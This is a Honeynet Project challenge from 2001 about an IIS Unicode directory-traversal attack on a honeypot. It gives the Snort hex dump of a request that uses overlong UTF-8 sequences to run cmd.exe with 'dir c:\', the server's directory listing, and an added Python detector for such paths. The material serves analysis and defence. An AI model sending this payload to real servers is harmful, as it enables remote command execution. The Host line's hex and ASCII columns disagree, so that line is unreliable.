# SCAN OF THE MONTH #12: February, 2001

Challenge to see who can determine which tool was used and the purpose of this attack. Packet decodes using snort (http://www.snort.org).

The packets were captured from the wild as part of the Honeynet Project, http://project.honeynet.org

QUESTIONS:
----------

Below is a specific probe/exploit run against our honeypot, 172.16.1.106. As you read through these signatures, the challenge is to answer the following questions:

### QUESTION 1: What is the operating system of the honeypot, how do you know?

### QUESTION 2: What is the name of this attack?

### QUESTION 3: What is the attack attempting to accomplish?

### QUESTION 4: How does the attack work?

BONUS QUESTION: Is it possible to gain remote control of the system using this technique? If so, how?

SIGNATURES:
-----------

### Network Capture

```text
-*> Snort! <*-
Version 1.7
By Martin Roesch (roesch@clark.net, www.snort.org)
Exiting...
lisa $more tmp.txt

--== Initializing Snort ==--
TCPDUMP file reading mode.
Reading network traffic from "snort-1226@0006.log" file.
snaplen = 1514

--== Initialization Complete ==--

12/26-07:06:00.871327 128.173.37.135:1443 -> 172.16.1.106:80
TCP TTL:13 TOS:0x40 ID:34723 IpLen:20 DgmLen:44 DF
******S* Seq: 0x2BDC106  Ack: 0x0  Win: 0x2000  TcpLen: 24
TCP Options (1) => MSS: 1460
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/26-07:06:00.872760 172.16.1.106:80 -> 128.173.37.135:1443
TCP TTL:127 TOS:0x0 ID:13343 IpLen:20 DgmLen:44 DF
***A**S* Seq: 0x1CB9F185  Ack: 0x2BDC107  Win: 0x2238  TcpLen: 24
TCP Options (1) => MSS: 1460
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/26-07:06:01.109979 128.173.37.135:1443 -> 172.16.1.106:80
TCP TTL:13 TOS:0x40 ID:35235 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x2BDC107  Ack: 0x1CB9F186  Win: 0x2238  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/26-07:06:01.155349 128.173.37.135:1443 -> 172.16.1.106:80
TCP TTL:13 TOS:0x40 ID:35491 IpLen:20 DgmLen:493 DF
***AP*** Seq: 0x2BDC107  Ack: 0x1CB9F186  Win: 0x2238  TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E  GET /msadc/.....
2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F  ./....../....../
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63  winnt/system32/c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A  md.exe?/c+dir+c:
5C 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65  \ HTTP/1.1..Acce
70 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69  pt: image/gif, i
6D 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20  mage/x-xbitmap,
69 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67  image/jpeg, imag
65 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61  e/pjpeg, applica
74 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65  tion/vnd.ms-exce
6C 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D  l, application/m
73 77 6F 72 64 2C 20 61 70 70 6C 69 63 61 74 69  sword, applicati
6F 6E 2F 76 6E 64 2E 6D 73 2D 70 6F 77 65 72 70  on/vnd.ms-powerp
6F 69 6E 74 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70  oint, */*..Accep
74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75  t-Language: en-u
73 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69  s..Accept-Encodi
6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74  ng: gzip, deflat
65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D  e..User-Agent: M
6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70  ozilla/4.0 (comp
61 74 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30  atible; MSIE 5.0
31 3B 20 57 69 6E 64 6F 77 73 20 39 35 29 0D 0A  1; Windows 95)..
48 6F 73 74 3A 20 6C 61 62 2E 77 69 72 65 74 72  Host: lib.bvxttr
69 70 2E 6E 65 74 0D 0A 43 6F 6E 6E 65 63 74 69  ip.org..Connecti
6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A  on: Keep-Alive..
43 6F 6F 6B 69 65 3A 20 41 53 50 53 45 53 53 49  Cookie: ASPSESSI
4F 4E 49 44 47 51 51 51 51 51 5A 55 3D 4B 4E 4F  ONIDGQQQQQZU=KNO
48 4D 4F 4A 41 4B 50 46 4F 50 48 4D 4C 41 50 4E  HMOJAKPFOPHMLAPN
49 46 49 46 42 0D 0A 0D 0A 41 50 4E 49 46 49 46  IFIFB....APNIFIF
42 0D 0A 0D 0A                                   B....
```

### Session Breakout file

```text
ids# $more SESSION:1443-80
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 26 Dec 2000 13:05:30 GMT
Connection: close
Content-Type: application/octet-stream

 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of c:\

11/26/00  12:34p                     0 AUTOEXEC.BAT
11/26/00  06:57p                   322 boot.ini
11/26/00  12:34p                     0 CONFIG.SYS
12/07/00  03:30p                       InetPub
12/07/00  03:12p                       Multimedia Files
12/20/00  05:13p            78,643,200 pagefile.sys
12/21/00  08:59p                       Program Files
12/21/00  08:59p                       TEMP
12/20/00  05:14p                       WINNT
               9 File(s)     78,643,522 bytes
                          1,779,191,808 bytes free
```
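The captured GET request carries raw C0 AF byte pairs at the points where the traversal's path separators sit, and the server's directory listing in the session file shows the request was honoured. The following is an added example for detection, not part of the original challenge material or of Snort: it percent-decodes a URL path, decodes UTF-8 leniently (accepting overlong two-byte forms the way a permissive server decoder would), normalizes the `..` segments and flags a path that climbs out of the web root. The wire bytes are re-typed from the hex dump above; the function names are mine.

```python
from urllib.parse import unquote_to_bytes

# Path from the captured GET request (hex dump above), as raw wire bytes.
# The three C0 AF pairs are overlong two-byte UTF-8 encodings of U+002F '/'.
CAPTURED_PATH = (b"/msadc/..\xc0\xaf../..\xc0\xaf../..\xc0\xaf../"
                 b"winnt/system32/cmd.exe")


def lenient_utf8_decode(data: bytes):
    """Decode ASCII and two-byte UTF-8, accepting overlong forms.
    Returns (text, overlong_count). Python's strict decoder rejects C0 AF; a
    lenient one maps it to '/', and a normalizing detector must reproduce that
    to see the path the server saw. Longer sequences become U+FFFD."""
    out, overlong, i = [], 0, 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:  # value fits in one byte, so this form is overlong
                overlong += 1
            out.append(chr(cp))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out), overlong


def normalize_path(path: str) -> str:
    """Collapse '.' and '..' segments ('\\' counts as a separator); '..'
    segments that climb above the root are kept so the escape stays visible."""
    stack = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == ".." and stack and stack[-1] != "..":
            stack.pop()
        else:
            stack.append(seg)
    return "/" + "/".join(stack)


def analyze_path(raw: bytes) -> dict:
    """Percent-decode, leniently UTF-8-decode, normalize and flag one URL path."""
    decoded, overlong = lenient_utf8_decode(unquote_to_bytes(raw))
    norm = normalize_path(decoded)
    return {"overlong_sequences": overlong, "decoded": decoded, "normalized": norm,
            "escapes_webroot": norm.startswith("/.."),
            "names_cmd_exe": norm.lower().endswith("/cmd.exe")}
```

Running `analyze_path(CAPTURED_PATH)` reports three overlong sequences and a normalized path of `/../../../../../winnt/system32/cmd.exe`; the same result comes back for the percent-encoded spelling `%c0%af`, which is why a detector should canonicalize before matching rather than match the literal bytes.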